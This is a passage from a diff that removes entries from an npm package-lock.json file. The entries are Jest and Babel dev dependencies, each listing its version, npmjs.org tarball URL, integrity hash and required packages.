"sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true - }, - "electron-to-chromium": { - "version": "1.4.455", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.455.tgz", - "integrity": "sha512-8tgdX0Odl24LtmLwxotpJCVjIndN559AvaOtd67u+2mo+IDsgsTF580NB+uuDCqsHw8yFg53l5+imFV9Fw3cbA==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true - }, - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "fill-range": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", - "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "requires": { - "function-bind": "^1.1.1" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "requires": { - "has": "^1.0.3" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - }, - "istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - } - }, - "jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - } - }, - "jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true - }, - "jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true - }, - "jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "requires": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - } - }, - "jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - 